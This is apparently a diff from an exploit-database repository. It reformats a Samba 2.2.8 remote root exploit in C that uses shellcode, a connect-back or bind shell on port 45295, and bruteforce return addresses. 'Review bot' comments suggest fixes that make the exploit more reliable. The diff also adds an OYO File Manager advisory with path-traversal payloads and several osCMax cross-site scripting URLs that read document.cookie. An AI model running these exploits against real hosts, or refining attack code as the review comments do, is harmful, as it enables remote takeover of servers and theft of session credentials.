@@ -778,8 +720,7 @@ exploit_openbsd32(int sock, unsigned long ret, char *shellcode) smbheader->tid = 0x01; smbheader->uid = 100; - memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex -ploit_data), 0x90, 3000); + memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); for (i = 0; i < 4 * 24; i += 4) memcpy(buffer + 1131 + i, &dummy, 4); @@ -789,8 +730,7 @@ ploit_data), 0x90, 3000); memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); - memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)) -; + memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; @@ -801,8 +741,7 @@ ploit_data), 0x90, 3000); } -int -main (int argc,char *argv[]) +int main (int argc,char *argv[]) { char *shellcode = NULL; char scan_ip[256]; @@ -832,10 +771,8 @@ main (int argc,char *argv[]) struct hostent *he; - fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric -.org|be)\n" - "------------------------------------------------------ ---------\n"); + fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n" + "--------------------------------------------------------------\n"); while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { switch(opt) @@ -843,8 +780,7 @@ main (int argc,char *argv[]) case 'b': brute = atoi(optarg); if ((brute < 0) || (brute > 3)) { - fprintf(stderr, "Invalid platform.\n\n" -); + fprintf(stderr, "Invalid platform.\n\n"); return -1; } break; 
@@ -853,38 +789,29 @@ main (int argc,char *argv[]) if (STEPS == 0) STEPS++; break; case 'c': - sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, - &ip4); + sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); connectback = 1; - if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == -0) { - fprintf(stderr, "Invalid IP address.\n\ -n"); + if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) { + fprintf(stderr, "Invalid IP address.\n\n"); return -1; } - linux_connect_back[33] = ip1; bsd_connect_back[ -24] = ip1; - linux_connect_back[34] = ip2; bsd_connect_back[ -25] = ip2; - linux_connect_back[35] = ip3; bsd_connect_back[ -26] = ip3; - linux_connect_back[36] = ip4; bsd_connect_back[ -27] = ip4; + linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1; + linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2; + linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3; + linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4; break; case 'C': MAX_CHILDS = atoi(optarg); if (MAX_CHILDS == 0) { - fprintf(stderr, "Invalid number of chil -ds.\n"); + fprintf(stderr, "Invalid number of childs.\n"); return -1; } if (MAX_CHILDS > 99) { - fprintf(stderr, "Too many childs, using - 99. \n"); + fprintf(stderr, "Too many childs, using 99. \n"); MAX_CHILDS = 99; } @@ -918,13 +845,8 @@ ds.\n"); case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 16) { - for(i = 0; i < sizeof(targets) / 16; i+ -+) - fprintf(stdout, "%02d. %s - [0x%08x]\n", i + 1, - - targets[i].type -, (unsigned int) targets[i].ret); + for(i = 0; i < sizeof(targets) / 16; i++) + fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret); fprintf(stderr, "\n"); return -1; } @@ -939,8 +861,7 @@ ds.\n"); } - if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && - scan == 0)) + if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) usage(argv[0] == NULL ? "sambal" : argv[0]); if (scan == 1) 
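Review bot: The connect-back parsing in `case 'c'` ignores `sscanf`'s return value and then treats any zero octet as invalid, so `-c 10.0.0.5` is rejected while `-c 300.1.1.1`, or `-c 1.2.3` with whatever `ip4` held before, is accepted and truncated when stored into `linux_connect_back[33..36]` / `bsd_connect_back[24..27]`. Checking the match count and the octet range fixes both: `if (sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4) != 4 ||` followed by `    ip1 < 0 || ip1 > 255 || ip2 < 0 || ip2 > 255 || ip3 < 0 || ip3 > 255 || ip4 < 0 || ip4 > 255) {` in place of the current zero test. main begins outside this hunk and the `ip1..ip4` declarations are not visible here.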
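Review bot: In `case 't'` the bound `type > sizeof(targets) / 16` hard-codes the entry size; the `targets` struct shown earlier holds two pointers, an `unsigned long` and an `int`, which is 16 bytes only on a 32-bit build, so on an LP64 build (presumably 32 bytes per entry) the listing loop prints past the table and a `type` up to twice the real count is accepted, after which `targets[type - 1]` in the later hunks reads out of bounds. Use the element size instead: `if (type == 0 || type > sizeof(targets) / sizeof(targets[0])) {` and `for(i = 0; i < sizeof(targets) / sizeof(targets[0]); i++)`. main's body continues outside this hunk.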
@@ -967,20 +888,17 @@ ds.\n"); for (ip4 = 0; ip4 < 255; ip4++) { i++; - snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.% -u.%u", ip1, ip2, ip3, ip4); + snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4); usleep(BRUTE_DELAY); switch (fork()) { case 0: switch(is_samba(scan_ip, 2)) { case 0: - fprintf(stdout, - "+ [%s] Samba\n", scan_ip); + fprintf(stdout, "+ [%s] Samba\n", scan_ip); break; case 1: - fprintf(stdout, - "+ [%s] Windows\n", scan_ip); + fprintf(stdout, "+ [%s] Windows\n", scan_ip); break; default: break; @@ -989,8 +907,7 @@ u.%u", ip1, ip2, ip3, ip4); exit(0); break; case -1: - fprintf(stderr, "+ fork() error -\n"); + fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: @@ -1022,8 +939,7 @@ u.%u", ip1, ip2, ip3, ip4); shellcode = targets[type - 1].shellcode; if (connectback == 1) { - fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452 -95]\n", + fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", ip1, ip2, ip3, ip4); switch(targets[type - 1].os_type) { 
@@ -1061,31 +977,26 @@ u.%u", ip1, ip2, ip3, ip4); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); - if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == --1) { + if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { fprintf(stderr, "+ connect() error.\n"); return -1; } - if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t -ype); + if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type); if (force == 0) { if (is_samba(argv[optind], 2) != 0) { - fprintf(stderr, "+ Host is not running samba!\n -\n"); + fprintf(stderr, "+ Host is not running samba!\n\n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } - if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", ( -char *)inet_ntoa(addr1.sin_addr), port); + if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); - if (start_session(sock) < 0) fprintf(stderr, "+ Session failed. -\n"); + if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); sleep(5); @@ -1104,16 +1015,13 @@ char *)inet_ntoa(addr1.sin_addr), port); sleep(2); if (connectback == 0) { - if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add -r2)) == -1) { - fprintf(stderr, "+ Exploit failed, try -b to br -uteforce.\n"); + if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) { + fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n"); return -1; } - fprintf(stdout, "-------------------------------------- -------------------------\n"); + fprintf(stdout, "--------------------------------------------------------------\n"); shell(sock2); close(sock); 
@@ -1138,20 +1046,17 @@ uteforce.\n"); case 1: if (ret == 0) ret = 0xbfc00000; shellcode = bsd_bindcode; - fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\ -n"); + fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n"); break; case 2: if (ret == 0) ret = 0xdfc00000; shellcode = bsd_bindcode; - fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr -ior)\n"); + fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n"); break; case 3: if (ret == 0) ret = 0x00170000; shellcode = bsd_bindcode; - fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non- -exec stack)\n"); + fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n"); break; } @@ -1182,8 +1087,7 @@ exec stack)\n"); if (sock2 > 2) close(sock2); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { - if (verbose == 1) fprintf(stderr, "+ socket() error.\n" -); + if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); } else { ret -= STEPS; @@ -1191,21 +1095,18 @@ exec stack)\n"); } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) - if (verbose == 1) fprintf(stderr, "+ socket() error.\n" -); + if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); if ((ret & 0xff) == 0x00 && brute != 3) ret++; - if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u -nsigned int)ret); + if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret); usleep(BRUTE_DELAY); switch (childs[i] = fork()) { case 0: - if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad -dr), port, 2) == -1) { + if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); 
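Review bot: In the `@@ -1191` hunk, `if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) if (verbose == 1) fprintf(stderr, "+ socket() error.\n");` only logs the failure, and only in verbose mode; the loop then proceeds to `fork()` and `Connect(sock, ...)` with a descriptor of -1, so the bruteforce attempt is silently wasted and a non-verbose run never learns why. Making the check unconditional and abandoning the iteration, e.g. `if ((sock2 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("+ socket()"); continue; }` (assuming the enclosing loop allows `continue`), would surface descriptor exhaustion, which is plausible in a fork-per-attempt loop. The literal `6` is `IPPROTO_TCP`; naming it would help the reader. The surrounding bruteforce loop starts before the hunk.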
@@ -1213,30 +1114,23 @@ dr), port, 2) == -1) { if(write_timer(sock, 3) == 1) { if (start_session(sock) < 0) { - if (verbose == 1) fprintf(stder -r, "+ Session failed.\n"); + if (verbose == 1) fprintf(stderr, "+ Session failed.\n"); if (sock > 2)close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (brute == 3) { - if (exploit_openbsd32(sock, ret -, shellcode) < 0) { - if (verbose == 1) fprin -tf(stderr, "+ Failed.\n"); - if (sock > 2) close(so -ck); - if (sock2 > 2) close(so -ck2); + if (exploit_openbsd32(sock, ret, shellcode) < 0) { + if (verbose == 1) fprintf(stderr, "+ Failed.\n"); + if (sock > 2) close(sock); + if (sock2 > 2) close(sock2); exit(-1); } } else { - if (exploit_normal(sock, ret, shellcode -) < 0) { - if (verbose == 1) fprintf(stder -r, "+ Failed.\n"); + if (exploit_normal(sock, ret, shellcode) < 0) { + if (verbose == 1) fprintf(stderr, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); @@ -1244,14 +1138,12 @@ r, "+ Failed.\n"); if (sock > 2) close(sock); - if ((sock2 = socket(AF_INET, SOCK_STREA -M, 6)) < 0) { + if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (sock2 > 2) close(sock2); exit(-1); } - if(Connect(sock2, (char *)inet_ntoa(add -r1.sin_addr), 45295, 2) != -1) { + if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { if (sock2 > 2) close(sock2); kill(getppid(), SIGUSR1); } diff --git a/platforms/multiple/webapps/37058.txt b/platforms/multiple/webapps/37058.txt new file mode 100755 index 000000000..8695011ec --- /dev/null +++ b/platforms/multiple/webapps/37058.txt 
@@ -0,0 +1,355 @@ +Document Title: +=============== +OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1494 + + +Release Date: +============= +2015-05-18 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1493 + + +Common Vulnerability Scoring System: +==================================== +6.9 + + +Product & Service Introduction: +=============================== +OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos. +Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-18: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Balaji Rajan +Product: OYO File Manager - iOS & Android 1.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 Local File Include Vulnerability +A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. 
+The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious +`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in +the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the +`wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function. +Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious +attack requests. + +The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] upload (GCDWebUploader) + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080/) + + +1.2 Local Command Injection Vulnerability +A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. +The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application. + +The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. 
Local attackers are able to inject own +own malicious system specific commands to requests the vulnerable `devicename` value. The devicename value is displayed in the header location +of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync. + +The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. +Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes. + +The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. +Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction. +Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application +or the connected device components. + +Request Method(s): + [+] [SYNC] + +Vulnerable Module(s): + [+] Path Listing + +Vulnerable Parameter(s): + [+] devicename + + + +1.3 Remote Path Traversal Vulnerability +A Path Traveral web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. +The security vulnerability allows remote attackers to unauthorized request system path variables to compromise the mobile application or device. + +The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable +to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction. +The attack vector is located on the application-side of the service and the request method to execute is GET (client-side). 
+ +The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. +Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. +Successful exploitation of the vulnerability results in mobile application compromise. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] open + [+] list + +Vulnerable Parameter(s): + [+] path + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080/) + + +Proof of Concept (PoC): +======================= +1.1 +The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Open the interface +2. Start a session tamper +3. Upload a reandom file +4. Change in the upload POST method request the vulnerable filename to a local file variable +Note: The website reloads +5. The execution occurs in the main file dir index were the upload has been replaced +6. Successful reproduce of the mobile web vulnerability! 
+ +--- PoC Session Logs [POST] --- + +Status: 200[OK] +POST http://localhost/upload +Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Content-Length[831] + Content-Type[multipart/form-data; boundary=---------------------------33361466725643] + Connection[keep-alive] + Pragma[no-cache] + Cache-Control[no-cache] + POST-Daten: + POST_DATA[-----------------------------33361466725643 +Content-Disposition: form-data; name="path"/test23/ +-----------------------------33361466725643 +Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png" +Content-Type: image/png +- Response +Status=OK - 200 +Server=GCDWebUploader +Cache-Control=no-cache +Content-Length=2 +Content-Type=application/json +Connection=Close +Date=Tue, 12 May 2015 12:24:23 GMT + + + +Reference(s): +http://localhost/upload + + +1.2 +The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Install the android or ios application to your device +2. Start the application +3. Change the local devicename value in the ios settings to a own payload string (local command inject) +4. Save the settings +5. Open the wifi interface and watch the index webserver site +6. The execution occurs in the header location of the webpage were the devicename value is visible +6. Successful reproduce of the mobile web vulnerability! 
+ + +PoC: +OYO +[LOCAL COMMAND INJECT VULNERABILITY!]23 IOS Version 8.3 + +
+
+ 25.89 GB used
+ + +
+ 1.30 GB free space +
+ + + +1.3 +the path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Payload(s) +http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ +http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ +http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ + +--- PoC Session Logs [GET] --- + +Status: 200[OK] +GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png +Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Server[GCDWebUploader] + Cache-Control[no-cache] + Content-Length[59] + Content-Type[application/json] + Connection[Close] + Date[Tue, 12 May 2015 12:24:25 GMT] + + +14:21:43.214[9ms][total 9ms] Status: 200[OK] +GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Etag[8831597/1431433463/0] + Last-Modified[Tue, 12 May 2015 12:24:23 GMT] + Server[GCDWebUploader] + Content-Type[image/png] + Content-Length[538] + Connection[Close] + 
Date[Tue, 12 May 2015 12:24:25 GMT] + Cache-Control[no-cache] + + + + +Reference(s): +http://localhost/list?path= +http://localhost/open?path= +http://localhost/download?path= + + +Solution - Fix & Patch: +======================= +1.1 +The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request. +Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload. + +1.2 +Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks. + +1.3 +The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context. +Encode the input of files to folders and disallow special chars. Implement a whitelist or a exception to prevent unauthorized path value requests via GET method. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5) + +1.2 +The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6) + +1.3 +The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. 
+ + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/php/webapps/37038.txt b/platforms/php/webapps/37038.txt new file mode 100755 index 000000000..91574f336 --- /dev/null +++ b/platforms/php/webapps/37038.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +
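Review bot: Section 1.1 is titled a local file include, but what the `POST /upload` log actually demonstrates is a `../` sequence in the multipart `filename` field (`filename="../[...]testfile.png"`), i.e. path traversal on the upload name leading to a file written outside the chosen directory; no inclusion or execution of an existing local file is shown, so the heading and the "mobile application compromise" impact overstate it. Section 1.2 likewise describes command injection, yet the PoC only shows the device name rendered unescaped in the index page header, which is persistent XSS at most; I would retitle 1.1 `Path Traversal via upload filename (arbitrary file write)` and 1.2 `Persistent XSS via device name` unless command execution was actually observed. The severity figures also disagree with each other: the header gives 6.9, 1.2 is "medium" with 5.6 under Technical Details but "high (CVSS 5.6)" under Security Risk, and the VL-ID reads 1493 while the source URL is `id=1494`. Finally, the "no privileged account" precondition should state that the GCDWebUploader server is exposed on the device's Wi-Fi interface, so the attacker must be on the same network (the `localhost` in the logs is presumably the tester's forwarded view).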
+ + + +
\ No newline at end of file diff --git a/platforms/php/webapps/37039.txt b/platforms/php/webapps/37039.txt new file mode 100755 index 000000000..25bc229e3 --- /dev/null +++ b/platforms/php/webapps/37039.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +
+ + + + + + +
\ No newline at end of file
diff --git a/platforms/php/webapps/37040.txt b/platforms/php/webapps/37040.txt
new file mode 100755
index 000000000..acd23f8f0
--- /dev/null
+++ b/platforms/php/webapps/37040.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52886/info
+
+osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+osCMax 2.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/xsell.php?search=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37041.txt b/platforms/php/webapps/37041.txt
new file mode 100755
index 000000000..3454325b1
--- /dev/null
+++ b/platforms/php/webapps/37041.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/52886/info
+
+osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+osCMax 2.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/stats_products_purchased.php?gross=%22%20%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
+http://www.example.com/admin/stats_products_purchased.php?max=%27%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37042.txt b/platforms/php/webapps/37042.txt
new file mode 100755
index 000000000..9e1dd80c0
--- /dev/null
+++ b/platforms/php/webapps/37042.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52886/info
+
+osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+osCMax 2.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37043.txt b/platforms/php/webapps/37043.txt
new file mode 100755
index 000000000..9d6a0ad92
--- /dev/null
+++ b/platforms/php/webapps/37043.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52886/info
+
+osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+osCMax 2.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/stats_customers.php?sorted=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37044.txt b/platforms/php/webapps/37044.txt
new file mode 100755
index 000000000..c886542b6
--- /dev/null
+++ b/platforms/php/webapps/37044.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52886/info
+
+osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+osCMax 2.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/information_manager.php?information_action=Edit&information_id=%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37045.txt b/platforms/php/webapps/37045.txt
new file mode 100755
